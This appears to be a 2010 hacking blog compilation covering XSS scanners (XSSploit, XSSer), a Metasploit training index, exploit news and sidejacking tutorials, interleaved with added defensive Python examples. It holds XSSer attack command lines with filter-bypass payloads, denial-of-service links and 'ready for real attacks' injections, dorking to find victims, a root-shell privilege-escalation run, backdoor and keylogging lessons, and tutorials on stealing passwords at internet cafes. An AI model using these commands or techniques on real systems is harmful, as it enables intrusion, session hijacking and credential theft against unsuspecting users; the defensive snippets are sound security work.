
XSSploit


Introduction :

XSSploit is a multi-platform Cross-Site Scripting scanner and exploiter written in Python. It has been developed to help discover and exploit XSS vulnerabilities during penetration testing engagements.

When used against a website, XSSploit first crawls the whole site and identifies the forms it encounters. It then analyses these forms to automatically detect existing XSS vulnerabilities as well as their main characteristics (which parameter reflects, and in what context).

The vulnerabilities that have been discovered can then be exploited using XSSploit's exploit generation engine. This extensible functionality lets you choose the desired exploit behaviour and automatically generates the corresponding HTML link embedding the exploit payload.

A video is available that explains how to use XSSploit.
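The two scanner steps described above (find the forms on a page, then work out whether and how a submitted value is reflected) are shown here as an added, self-contained example. This is not XSSploit's code; the sample page, the probe token and the `fake_server` stand-in for the target application are all constructed for the demonstration. Classifying the reflection context (text, attribute or script block) is what tells a reviewer whether output encoding is missing, and which encoding is needed.

```python
import html
from html.parser import HTMLParser

# Constructed sample page (not from any real site): one search form.
SAMPLE_PAGE = """
<html><body>
<form action="/search" method="get">
  <input type="text" name="q">
  <input type="hidden" name="lang" value="en">
  <input type="submit" value="Go">
</form>
</body></html>
"""

class FormCollector(HTMLParser):
    """Collects <form> elements and their named <input> fields, the way a
    crawler does before deciding which parameters to probe."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": (a.get("method") or "get").lower(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None and a.get("name"):
            self._current["inputs"].append({"name": a["name"],
                                            "type": a.get("type") or "text"})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def find_forms(page_html):
    parser = FormCollector()
    parser.feed(page_html)
    return parser.forms

# The probe carries angle brackets so we can tell "reflected raw" from
# "reflected as &lt;...&gt;"; the token itself is meaningless to a browser.
PROBE = "<zq9x>"

def reflection_context(response_html, probe=PROBE):
    """Classify how the probe comes back:
    'absent', 'escaped', 'raw:text', 'raw:attribute' or 'raw:script'."""
    pos = response_html.find(probe)
    if pos == -1:
        return "escaped" if html.escape(probe) in response_html else "absent"
    before = response_html[:pos].lower()
    if before.count("<script") > before.count("</script"):
        return "raw:script"          # inside an open <script> block
    if before.rfind("<") > before.rfind(">"):
        return "raw:attribute"       # inside an unclosed tag
    return "raw:text"

def scan_forms(page_html, send, probe=PROBE):
    """Probe every named field of every form; `send(form, params)` returns
    the response body (a real scanner would issue the HTTP request)."""
    findings = []
    for form in find_forms(page_html):
        for field in form["inputs"]:
            params = {f["name"]: "" for f in form["inputs"]}
            params[field["name"]] = probe
            ctx = reflection_context(send(form, params), probe)
            findings.append((form["action"], field["name"], ctx))
    return findings

def fake_server(form, params):
    """Constructed stand-in for the target: echoes `q` unescaped (the
    defect) and `lang` through html.escape (the fix)."""
    return "<p>Results for %s in %s</p>" % (params.get("q", ""),
                                           html.escape(params.get("lang", "")))

if __name__ == "__main__":
    for action, name, ctx in scan_forms(SAMPLE_PAGE, fake_server):
        print(action, name, ctx)
```

Run as-is it reports `q` as `raw:text` and `lang` as `escaped`; swapping `fake_server` for a function that performs the real request turns it into the form-probing loop the paragraph describes.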

Requirements :

The following elements are required by XSSploit:

- Python 2.5
- wxPython GUI toolkit

Download : http://www.scrt.ch/outils/xssploit/Xssploit-0.5.tar.gz

Source : http://www.scrt.ch/pages_en/xssploit.html

[ TOOLS ] : XSSer



XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.

Usage

python XSSer.py [-u |-i |-d ] [-p |-g |-c ] [OPTIONS] [Request] [Bypassing] [Techniques]

Examples

* Simple injection from URL:

$ python XSSer.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

$ python XSSer.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with fuzzing, using tor proxy, encoding the payload characters in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):

$ python XSSer.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --Fuzz --Hex --verbose -w
-------------------
* Multiple injections from URL, with fuzzing, using character encoding mutations (first, change payload to hexadecimal; second, change the first encoding to StringFromCharCode; third, re-encode the second encoding to Hexadecimal), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):

$ python XSSer.py -u "http://host.com" --Fuzz --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advanced injection from File, supplying your -own- payload and using Unescape() character encoding to bypass filters:

$ python XSSer.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une

-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):

$ python XSSer.py --De "duck" -d "search.php?"

-------------------
* Injection from Crawler with depth 3 and 4 pages to see (XSSer Spider!):

$ python XSSer.py -c3 --Cw=4 -u "http://host.com"

-------------------
* Simple injection from URL, using POST, with statistics results:

$ python XSSer.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s

-------------------
* Multiple injections from URL to a parameter sent with GET, using Fuzzing, with IP Octal payload obfuscation and printing results as a "tinyurl" shortened link (ready for share!):

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Fuzz --Doo --short tinyurl

-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Coo --Anchor --Fr="!enter your final injection code here!"

-------------------
* Simple injection from URL, using GET and trying to generate from the results a "malicious" shortened link (is.gd) with a valid DoS (Denial of Service) browser client payload:

$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"

-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying Fuzzing, changing timeout to "20" and using multithreads (5 threads), increasing delay between requests to 10 seconds, injecting parameters in HTTP User-Agent, HTTP Referer and Cookie parameters, using proxy Tor, with IP Octal obfuscation, with statistics results, in verbose mode and creating shortened links (tinyurl) of any valid injecting payloads found. (real playing mode!):

$ python XSSer.py -i "list_of_url_targets.txt" --Fuzz --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"

-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.

$ python XSSer.py --Imx "test.png" --payload "!enter your malicious injection code here!"

-------------------
* Report 'positive' injections of a dorking search (using "ask" dorker) directly to an XML file:

$ python XSSer.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"

-------------------
* Publish 'positive' injections of a dorking search (using "duck" dorker) directly to http://identi.ca (federated XSS pentesting botnet):

$ python XSSer.py -d "login.php" --De "duck" --publish
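The --Hex, --Str, --Une and --Cem "Hex,Str,Hex" options above all wrap one payload in layers of JavaScript encodings, which is exactly what defeats a filter or log search that matches the literal string. The added example below (not XSSer's code; the three tiny encoders are constructed only to build test input mimicking those options) shows the detection side: unwind the encodings to a fixed point before looking for script markers, so a request log entry or WAF rule sees the canonical form no matter how many layers were stacked.

```python
import re

# --- constructed encoders mimicking the --Hex / --Str / --Une mutations ---
def hex_encode(s):
    """JavaScript-style \\xNN escape of every character."""
    return "".join("\\x%02x" % ord(c) for c in s)

def str_encode(s):
    """Wrap text as String.fromCharCode(n1,n2,...)."""
    return "String.fromCharCode(%s)" % ",".join(str(ord(c)) for c in s)

def une_encode(s):
    """Percent-encode every character inside unescape('...')."""
    return "unescape('%s')" % "".join("%%%02X" % ord(c) for c in s)

# --- decoders used by the detector ---
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
PCT_RE = re.compile(r"%([0-9a-fA-F]{2})")
STR_RE = re.compile(r"String\.fromCharCode\(([0-9,]+)\)")
UNE_RE = re.compile(r"unescape\((['\"])(.*?)\1\)")

def decode_once(s):
    """Strip one layer of each encoding. Order does not matter because
    canonicalize() repeats until nothing changes."""
    s = UNE_RE.sub(lambda m: m.group(2), s)                 # unescape('..') -> ..
    s = HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), s)   # \x41 -> A
    s = PCT_RE.sub(lambda m: chr(int(m.group(1), 16)), s)   # %41 -> A
    s = STR_RE.sub(lambda m: "".join(chr(int(n)) for n in m.group(1).split(",")), s)
    return s

def canonicalize(s, max_rounds=10):
    """Decode layer after layer until a fixed point (or a round cap, so
    pathological input cannot spin forever)."""
    for _ in range(max_rounds):
        t = decode_once(s)
        if t == s:
            break
        s = t
    return s

# Markers a detector looks for once the input is in canonical form.
MARKERS = ("<script", "javascript:", "onerror=", "onload=", "alert(")

def is_suspicious(s):
    c = canonicalize(s).lower()
    return any(m in c for m in MARKERS)

if __name__ == "__main__":
    # Same stacking as --Cem "Hex,Str,Hex" on the page.
    layered = hex_encode(str_encode(hex_encode("alert(1)")))
    print(layered[:40] + "...")
    print(canonicalize(layered), is_suspicious(layered))
```

The point for a defender is that `is_suspicious` gives the same answer for the plain and the triple-encoded form; a blocklist that runs before such normalisation gives different answers, which is why output encoding at the point of rendering, rather than input blocklisting, is the durable fix.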

http://xsser.sourceforge.net

Download : 
http://downloads.sourceforge.net/xsser/xsser-1.0b.tar.gz

Source :
http://xsser.sourceforge.net

METASPLOIT TRAINING V2

METASPLOIT TRAINING V2.0(2010) : BY PENTEST101 TEAM
BLOG : Pentest101.BlogSpot.Com


METASPLOIT FRAMEWORK :

Metasploit - Penetration Testing Resources
Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project managed by Rapid7.

official site :
    http://www.metasploit.com/


before we start this training :
- all these courses belong to the pentest101 team .
- these courses are for educational purposes only .
- we are not responsible for any bad usage .
good , we can start noW .

You ArE FreE To SHARE the METASPLOIT TRAINING V2

------------auxiliary---------------
- auxiliary portscan
- auxiliary smb version
- auxiliary smb login check

------------hacking-xp--------------
- hacking xp sp3(bind)
- hacking xp sp3(reverse)
- hacking xp sp3(vncinject)

------------backdoors---------------
- make a backdoor : linux/x86
- make a backdoor (backdoor.py)
- encode a backdoor
- encode a backdoor (backdoor.py)
- make and encode a backdoor (with metasploit and sniff email u/p)
- script proback.py (backdoors for win32 linux osx)  

------------meterpreter-------------
- meterpreter commands
- Meterpreter (screensht and key_scan)
- meterpreter packet's sniffing
- meterpreter metscv

------------advanced-usage----------
- autopwn
- browser autopwn
- file autopwn
- java signed applet
- fake update msf and ettercap
- discovering and exploiting remote buffer overflow
- discovering and exploiting remote buffer overflow (egg-hunter)

DOWNLOAD LINK : http://www.megaupload.com/?d=HU32VOI0
PASSWORD : pentest101
you will help us by a small donation : http://pentest101.blogspot.com/p/donate.html
#Pentest101.blogspot.com .

[ METASPLOIT ] : JAVA-SIGNED-APPLET

[ METASPLOIT ] : java-signed-applet from Pentest101 Team on Vimeo.





apt-get install sun-java6-jdk
echo "JAVA_HOME=/usr/lib/jvm/java-6-sun" >> /etc/bash.bashrc
echo "export JAVA_HOME" >> /etc/bash.bashrc
JAVA_HOME=/usr/lib/jvm/java-6-sun
export JAVA_HOME
gem install rjb
Have Fun

[ NEWS ] : offensive-security-hacking-tournament

Got the itch to hack something but don’t want to spend time in prison? Do you wish there was a legal way you could hack some servers just for fun? Then we have a challenge for you. Offensive Security Training is initiating its first ever “Open Hacking Tournament” , and as you can imagine, we’re not going to play fair.
What do you have to do to win this challenge? Use the Internet, use your skills, call your friends, heck, ask your mama – whatever it takes for you to hack our lab machines.
You will race against the clock and against other “hackers” to be the first to compromise all our lab servers, in a CTF style, “sudden death” tournament.
On the Table: One FREE, PWB OR CTP online course with 30 days of labs for the single winner.
On the Clock: The contest will commence between the 8th and 9th of May, 2010.
Job to be Done: Hack the living heck out of our challenge servers, and submit your documentation.
How to Win: Hack us the fastest.

more information :
http://www.information-security-training.com/news/offensive-security-hacking-tournament/

[ NEWS ] : Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation

Author: Jon Oberheide
Usage:

$ python team-edward.py
[+] checking for reiserfs mount with user_xattr mount option
[+] checking for private xattrs directory at /.reiserfs_priv/xattrs
[+] preparing shell in /tmp
[+] capturing pre-shell snapshot of private xattrs directory
[+] compiling shell in /tmp
[+] setting dummy xattr to get reiserfs object id
[+] capturing post-shell snapshot of private xattrs directory
[+] found 1 new object ids
[+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
[+] spawning setuid shell...
# id
uid=0(root) gid=0(root) groups=4(adm), ...

Notes:

Obviously requires a ReiserFS filesystem mounted with extended attributes.
Tested on Ubuntu Jaunty 9.10.

http://www.exploit-db.com/exploits/12130
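The usage output above spells out both the precondition (a ReiserFS mount with user_xattr) and the artefact the technique leaves behind (a file carrying file capabilities). The added example below, which is not part of the advisory or exploit, turns those two facts into a host check: it parses /proc/mounts for exposed ReiserFS mounts and walks a tree listing regular files that carry the security.capability extended attribute. The /proc/mounts text is constructed; the xattr walk uses os.listxattr, which exists only on Linux, and falls back to an empty result elsewhere.

```python
import os
import stat

# Constructed /proc/mounts sample, not captured from any real host.
SAMPLE_MOUNTS = """\
/dev/sda1 / reiserfs rw,relatime,user_xattr 0 0
/dev/sda2 /home ext3 rw,relatime,user_xattr 0 0
/dev/sda3 /srv reiserfs rw,relatime 0 0
proc /proc proc rw 0 0
"""

def exposed_reiserfs_mounts(mounts_text):
    """Mount points of reiserfs filesystems mounted with user_xattr,
    i.e. the precondition the advisory lists."""
    hits = []
    for line in mounts_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        _dev, mnt, fstype, opts = parts[:4]
        if fstype == "reiserfs" and "user_xattr" in opts.split(","):
            hits.append(mnt)
    return hits

def private_xattr_dir_readable(path="/.reiserfs_priv/xattrs"):
    """The private xattr directory should not be reachable by an
    unprivileged user; True here is a finding."""
    return os.access(path, os.R_OK)

def files_with_capabilities(root):
    """Regular files under root that carry the security.capability xattr,
    the artefact a capability-granting attack leaves behind.
    Linux only; filesystems without xattr support are skipped."""
    listxattr = getattr(os, "listxattr", None)
    if listxattr is None:
        return []
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if not stat.S_ISREG(os.lstat(path).st_mode):
                    continue
                if "security.capability" in listxattr(path, follow_symlinks=False):
                    found.append(path)
            except OSError:
                continue                     # permission denied, unsupported fs, vanished
    return found

if __name__ == "__main__":
    try:
        with open("/proc/mounts") as fh:
            mounts = fh.read()
    except OSError:
        mounts = SAMPLE_MOUNTS                # not on Linux: use the constructed sample
    print("reiserfs+user_xattr mounts:", exposed_reiserfs_mounts(mounts))
    print("private xattr dir readable:", private_xattr_dir_readable())
    for mnt in exposed_reiserfs_mounts(mounts):
        print("files with capabilities under %s:" % mnt, files_with_capabilities(mnt))
```

On a system where `getcap -r /` is available that command gives the same list faster; the Python version is useful where the libcap tools are not installed.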

[NEWS] : Apple Safari | Tag (heap spray) Remote Buffer Overflow Exploit (osX)

safari : remote bof

Exploit Code : 

#!/usr/bin/env python
#######################################################
#
# Title: Apple Safari <= Tag (heap spray) Remote BOF Exploit (osX)
# Author: eidelweiss
# Special Thank`s to: AL-MARHUM - [D]eal [C]yber - all Senior MEDANHACKER
# Greats: JosS (hackown) , r0073r & 0x1D (inj3ct0r) , kuris (good job beib LOL)
# Tested on ibook OS X 10.4.11 (ibook g4)
#
#######################################################




http://securityreason.com/exploitalert/8022

[ EBOOKS ] : BUFFER OVERFLOW (EGG-HUNTER)

today we have a good paper about the egg-hunter technique
you can download it from here :

--- http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

this paper is not mine.
author's email : mmiller@hick.org

[ BUFFER OVERFLOW ] : metasploiT anD remotE buffeR overfloW

MSF & Remote buffer overflow from Pentest101 Team on Vimeo.

[ BACKTRACK ] : Paros Proxy ...

Paros Proxy ...

hi all ...




[ BACKTRACK ] : Maltego << information gathering >> ...

Maltego [ information gathering ] ...

hi all ...




[ BACKTRACK ] : bruteforcE routeR witH xhydrA ...

bruteforcE routeR witH xhydrA ...






[ METASPLOIT ] : meterpreteR as a servicE ...

meterpreter as a service ...
hi all ...


[ METASPLOIT ] : Packet Sniffing with Meterpreter ...

Packet Sniffing with Meterpreter ...



http://pentest101.blip.tv

[ METASPLOIT ] : searcH emaiL collectoR

searcH emaiL collectoR ... by mr-gefara (my friend)

http://p3ntest.blip.tv/

http://blip.tv/file/3171290
svn co http://www.metasploit.com/svn/framework3/trunk/modules/auxiliary/gather
cp -r gather /pentest/exploits/modules/auxiliary
then, in msfconsole :
search gather
use gather/search_email_collector
show options
set domain yoursite.com
run

[ METASPLOIT ] : changE youR metA banneR

changE youR metasploiT banneR ...
hi,every one

watch tutorial :








[ PYTHON ] : local buFF fuzz tools

local buFF fuzzeR tools (python) ...
hi, everyone ...
to speed up your work :
[+] fuzz1.py


#!/usr/bin/python
# coded by data$hack 2010
# usage : python fuzz1.py
# writes a file whose whole content is one repeated byte, to feed to a
# local file-parsing target while looking for a crash (Python 2)
import os
import sys

os.system("cls")  # clears the screen on Windows; use "clear" on Linux
d = raw_input("badchar [example (A)] : ")
g = d + " * ? [example (15000)] : "
b = int(raw_input(g))  # repeat count; int(raw_input()) instead of input(), which eval()s the text
s = raw_input("file extension [example (m3u)] : ")
a = (d or "A")[0] * b  # repeat the requested byte (the original always wrote '\x41')
k = "EvilFile." + s
try:
    fileHandle = open(k, 'w')
    fileHandle.write(a)
    fileHandle.close()
except IOError:
    print "error check something ..."
    sys.exit("")
print "\nfile created succ ..."

[+] md5 maker :
# builds a string of exactly d characters out of consecutive md5 digests,
# so an offset can be read back from whatever lands in a register (Python 2)
import hashlib
import os

os.system("cls")  # clears the screen on Windows; use "clear" on Linux
d = int(raw_input("give me a number : "))  # wanted length of the output
# each md5 hex digest is 32 characters; j = number of digests needed to reach d
k = 0
j = 0
while (k < d):
    k = k + 32
    j = j + 1
i = 0
cat = ""
while (i < j):
    i += 1
    m = hashlib.md5()
    m.update(str(i))
    cat += m.hexdigest()
# cut the concatenated digests down to exactly d characters
cat = cat[:d]
fileHandle = open('md5.md5', 'w')
fileHandle.write(cat)
fileHandle.close()
ftp fuzzer by pentest101 [very soon]
[*] finish ...
have fun ...

[ METASPLOIT ] : Add soundrecorder meterpreteR script to metasploit3 ...

Add soundrecorder meterpreteR script to metasploit3 ...
hi every one ...
[+] open terminal :
su
wget http://www.darkoperator.com/meterpreter/soundrecorder.zip
unzip soundrecorder.zip
cp soundrecorder/soundrecorder.rb /opt/metasploit3/msf3/scripts/meterpreter   [your metasploit location]
cp soundrecorder/linco.exe /opt/metasploit3/msf3/data
cp soundrecorder/oggenc.exe /opt/metasploit3/msf3/data
meterpreter soundrecorder by pentest101 [here] ...
[*]  finish ...

[ HIJACKING ] : HTTP Session Hijacking Demo using Hamster and Ferret

[ VIDEOS ] : some of my tutorials (2009)

some of my tutorials (2009)
hi every one ...
========1===========
the best tutorials : a metasploit walkthrough from the start of exploitation up to the meterpreter commands
========2===========
video tutorial : internet exp 7 memory corruption exploit [fast-track]
today's tutorial is one of the advanced ones : the internet exp 7 memory corruption exploit
tools : fast-track and netcat
this vulnerability is available in metasploit, but to speed things up a little the tutorial was done with fast-track .
=======3===========
simple remote buffer over... exploitation
thx to corelan for the .c code
you will find the code and the exploit together with the tutorial
God willing, it will be a starting point for you in : remote buffer overflow
=======4===========
because of the many questions about mitm, or man in the middle .
I wanted to make a very simple but very important tutorial with the program cain, a program known worldwide .
this tutorial shows how passwords get stolen from the network : for example, you are connected from an internet cafe where there are many victims, and you are in the middle doing your work .
this tutorial is for educational purposes only .
========fin=========

[ METASPLOIT ] : encode backdoor and sniffing

hi every one
make and encrypt a backdoor (with metasploit and sniff email username/password)
arabic:
making and encrypting a backdoor

and sniff email
have fun (*_*)

[ LINUX ] : install hamster in ubuntu (sidejacking attack)

install hamster in ubuntu (sidejacking attack) :
[*] open terminal
sudo su
apt-get install libpcap-dev
-----if you don't have a pentest folder, make one :
cd /
mkdir pentest
cd /pentest
wget http://hamster.erratasec.com/downloads/hamster-2.0.0.zip
unzip hamster-2.0.0.zip
mv hamster hamster2
cd hamster2/build/gcc4
make
cd /pentest/ferret/build/gcc4
make
cd /pentest
mkdir hamster
cp /pentest/ferret/bin/ferret /pentest/hamster
cp /pentest/hamster2/bin/favicon.ico /pentest/hamster
cp /pentest/hamster2/bin/hamster /pentest/hamster
cp /pentest/hamster2/bin/hamster.css /pentest/hamster
cp /pentest/hamster2/bin/hamster.js /pentest/hamster

cd /pentest
rm -rf ferret
rm -rf hamster2
rm -f hamster-2.0.0.zip
script to install hamster  [very soon] by pentest101
HTTP Session hijacking  [here] by pentest101
[*] finish
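Hamster works by replaying session cookies that Ferret captures from plaintext HTTP traffic, so the defence is on the application side: a session cookie that carries the Secure attribute is never sent over plain HTTP and cannot be sniffed this way, and HttpOnly keeps it out of reach of script. The added example below (not part of the Hamster or Ferret projects) audits Set-Cookie headers for exactly those two attributes; the headers and the session-name heuristics are constructed for the demonstration.

```python
# Constructed Set-Cookie headers, as a proxy or sniffer would see them on the wire.
SAMPLE_HEADERS = [
    "Set-Cookie: PHPSESSID=abc123; path=/",
    "Set-Cookie: auth_token=deadbeef; Path=/; Secure; HttpOnly",
    "Set-Cookie: lang=en; Path=/",
    "Set-Cookie: JSESSIONID=xyz; Path=/; HttpOnly",
]

# Substrings that usually mark a session or authentication cookie (heuristic, assumed).
SESSION_HINTS = ("sess", "auth", "token", "sid", "login")

def parse_set_cookie(header):
    """Split one Set-Cookie header into name, value and the attribute flags
    that matter for sidejacking. Attribute names are case-insensitive."""
    value = header.split(":", 1)[1].strip()
    parts = [p.strip() for p in value.split(";")]
    name, _, val = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return {"name": name.strip(), "value": val,
            "secure": "secure" in attrs, "httponly": "httponly" in attrs}

def looks_like_session(name):
    n = name.lower()
    return any(h in n for h in SESSION_HINTS)

def sidejacking_findings(headers):
    """Session-looking cookies that a sniffer on the network path could
    capture (no Secure) or that script could read (no HttpOnly)."""
    findings = []
    for h in headers:
        c = parse_set_cookie(h)
        if not looks_like_session(c["name"]):
            continue
        problems = []
        if not c["secure"]:
            problems.append("missing Secure: sent over plain HTTP, sniffable")
        if not c["httponly"]:
            problems.append("missing HttpOnly: readable by page script")
        if problems:
            findings.append((c["name"], problems))
    return findings

if __name__ == "__main__":
    for name, problems in sidejacking_findings(SAMPLE_HEADERS):
        print(name)
        for p in problems:
            print("  -", p)
```

Against the sample, PHPSESSID and JSESSIONID are reported and auth_token is not; the same function run over the Set-Cookie lines of a real response (for example from a proxy log) gives a quick read of whether a site's sessions are exposed to this kind of capture.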

[ Penetration Testing ]

A penetration test is a method of evaluating the security of a computer system or network by simulating an attack from a malicious source, known as a Black Hat Hacker, or Cracker. The process involves an active analysis of the system for any potential vulnerabilities that may result from poor or improper system configuration, known and/or unknown hardware or software flaws, or operational weaknesses in process or technical countermeasures. This analysis is carried out from the position of a potential attacker, and can involve active exploitation of security vulnerabilities. Any security issues that are found will be presented to the system owner together with an assessment of their impact and often with a proposal for mitigation or a technical solution. The intent of a penetration test is to determine feasibility of an attack and the amount of business impact of a successful exploit, if discovered. It is a component of a full security audit.
 
 

WARNING

The tools and informations on this site are provided for legal security research and testing purposes only.
You will be held responsible for your own actions.
have fun and good hunting .
